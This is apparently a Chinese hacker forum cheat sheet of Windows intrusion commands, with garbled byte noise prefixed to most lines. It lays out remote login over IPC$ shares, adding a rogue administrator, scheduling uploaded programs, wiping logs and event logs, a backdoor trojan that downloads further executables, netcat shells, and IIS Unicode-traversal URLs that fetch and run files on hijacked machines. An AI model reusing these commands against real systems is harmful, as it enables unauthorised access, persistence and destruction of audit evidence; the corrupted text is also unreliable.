网管和黑客都必须知道的命令
vA]W|s�LF9 常用的几条NET命令:
}L��#���_\ ~�=��=>pj (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
JST��uX��W q(�.:9A*0� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�9&_<f�}ou EuyXg�K>g� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�OG~6L�4�" <���F`>,Pm (查看远程主机时间) net time \\IP地址
G}:lzOlMH m6[0Kws��& (定时启动某个程序) at \\IP地址 02:18 readme.exe
O��d��%"B\ O0pD�d4�)" (查看共享) net view \\IP地址
��^�ml�'�? #7�q7PY�G4 (查看netbios工作组列表) nbtstat -A IP地址
2gq��9k}38 @]-jl}:]�� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�:=��\Ho�z �iT�Ax�=SG (这两条把自己增加到管理员组): net user 用户名 密码 /add
t-0�a7
1#e w &(|�e <� net localgroup Administrators 用户名 /add
q�CqFy#Ms\ -U/c�\-~fU (断开连接) net use \\IP地址\ipc$ /delete
|qmu�_x��\ gm[�z[~�X@ 扫尾:
{yB&x�j[z� aM:nOt" S1 del C:\winnt\system32\logfiles\*.*
$�l|qk�� z HLZ;8/|48m del C:\winnt\ssytem32\config\*.evt
U~�j
^��I^ �0QOBL'{7) del C:\winnt\system32\dtclog\*.*
��W^]�3XJP 'zG�o?a�� del C:\winnt\system32\*.log
8@2OJ�=`[ p�~,]*y:XT del C:\winnt\system32\*.txt
kAC��&S�!n (r D�_(%o� del C:\winnt\*.txt
�y�GP�S`�S s!�}ne"&0
del C:\winnt\*.log
%+K<<iyR| |�>JS!NM
I 一、netsvc.exe
�Wu_kx2��h 9)gC�6�IiW 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
L��G�1�r]2 )H��k3A$6( netsvc /list \\IP地址
H�r]h
�J�c �nw<&3k(g} netsvc schedule \\IP地址 /query
i�C�cB@GlA }XSfst5-H� netsvc \\IP地址 schedule /start
HAJ���7m!P 8pe�DI7[�| 二、OpenTelnet.exe
�\D�D0s��8 thvY�L.U�: 远程启动主机的Telnet服务,并绑定端口到7878,例如:
q11>��f��� tGl;@�V@Qj OpenTelnet \\IP地址 用户名 密码 1 7878
3
"�Q=�Vl" [>1OJY.S}T 然后就可以telnet到主机的7878端口,进入DOS方式下:
2U:H54�5]] p-�/|���mL telnet IP地址 7878
Y�5F��b��U qh2ON>�e;� 三、winshell.exe
\u�>��"s � �:E@3Vl#U� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
cvfr��)K[0 %�ve:hym*� p Path (查看winshell主程序的路径信息)
m��A*AeP_$ yA�.4�G_|I b reBoot (重新启动机器)
D6G�oa(!9d g47-�db"�5 d shutDown (关闭机器)
v(-{=*'�: y?a
Acn$�� s Shell (执行后你就会看到可爱的“C:\>”)
Ie`13�� L2 Q��Z:8+[oy x eXit (退出本次登录会话,此命令并不终止winshell的运行)
PV/7��7�{' ��\a6^LD}B CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�Z]j*9#G1s .72S ��o�T 四、3389登陆器,GUI方式登录远程主机的
sh`s��/JRf cn�FI
&,FM 五、elsave.exe
\e'R�����@ �<p\6AnkMr 事件日志清除工具
�YJ;j� �x0 Eg2�[k.�{P elsave -s \\IP地址 -l "application" -C
�ae0�>
��W RQ'H$�r.7g elsave -s \\IP地址 -l "system" -C
'�F�_8�j�; X(\�fN[�;� elsave -s \\IP地址 -l "security" -C
weE/TW�\e� ��<Gt2(�;� 执行后成功清除应用程序日志,系统日志,安全日志
�o�(r\E0�I �R&Jm�
+3N 六、hbulot.exe
C�O2C{~�Q5 �]z�Qo>�W$ 开启win2kserver和winxp的3389服务
w[���!^;#� �g�Upb4uN hbulot [/r]
#z2rzM@�/: I�uOgxm~Y 使用/r表示安装完成后自动重起目标使设置生效。
bLQ ^fH4ww I*IhwJFl/� 七、nc.exe(netcat.exe)
7_mw%|m6@ =R����Ah|e 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
ALNc'MW!� �-Gw�$�#�! 想要连接到某处: nc [-options] hostname port[s] [ports] ...
j|/]#@��Yr <�X7FMNr[� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
C�_�n9T{�k
2;^y4ss�g 参数:
Nv/v�$Z�{k ��@����*Wh -e prog 程序重定向,一旦连接,就执行 [危险!!]
`K�K>~T_$J 1�Lg-.�-V
-g gateway source-routing hop point[s], up to 8
y6�IX��d�W g|�<]B$yN# -G num source-routing pointer: 4, 8, 12, ...
-x'z
�XvWZ �839IRM@'5 -h 帮助信息
qZ�h�1�`\G %ix)8+E�b� -i secs 延时的间隔
8ZKo�_I\�
�ewfP �G,S -l 监听模式,用于入站连接
{�����e[c ��DWI�D$�w -n 指定数字的IP地址,不能用hostname
phn9:�{T�I /��qx0T�DB -o file 记录16进制的传输
�l4�11a�9o 1 29�q`u�; -p port 本地端口号
cu�%��C�" m�^H21P�"z -r 任意指定本地及远程端口
>lay��Jt�� MH{GR)ng:9 -s addr 本地源地址
�u�6Mz�R�C #s��sN�027 -u UDP模式
g q}�I[�N� �2A\,-*pc -v 详细输出——用两个-v可得到更详细的内容
W ]Nv33i
[ ��Ci<ATho� -w secs timeout的时间
;��W�l+�zw *_�KFW@bC: -z 将输入输出关掉——用于扫描时
C�WNx4)ZGw 八、TFTPD32.EXE
�8�S<@"��v B?)�@u|��0 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
raCi���� 8 ����uF��Lx http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
nIo�PC[%_
�x�,otF�p 然后可以直接令文件运行:
�{O,{�c\� El�o�Me~a3 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
K,e �w��>U x#Q��>J�"g 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
��{fEwA8Ir �lr{?"�tl_ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
'�/$d0`3B> �,N
e;k�I� 一、一 Xscan命令行运行参数说明:
^RP)>d9Xp{ DZv=\<$,LF 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
[ e8x&{L-_ |<�Gl91�� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
]Z�oD�'-, �`d[1`P1i[ xscan -file <主机列表文件名> <检测项目> [其他选项]
��*JaqTI,e �X5`A�GyX� 其中<检测项目> 含义如下:
XO9�M_�*Va �0���q�*r� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
PZm�:T�+5H J%jB?2
1:o -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
d5>�H3D{49 m1IKVa7-\} -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
? ��B�E6 g(Io�/h�yj -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
W�0C@9&pn6 b.@P%`@�a. -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
1=n�UW�":� �p?2Y�� }9 [其他选项] 含义如下:
H> �'>3]G� 9XHz�-+�bQ -v: 显示详细扫描进度
X5��]T�Y�] M#4QQ�} F. -p: 跳过Ping不通的主机
��U|5nNiJM $rhgzpZ!X_ -o: 跳过没有检测到开放端口的主机
c(/VYM�JZ& [F*4�EG��B -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
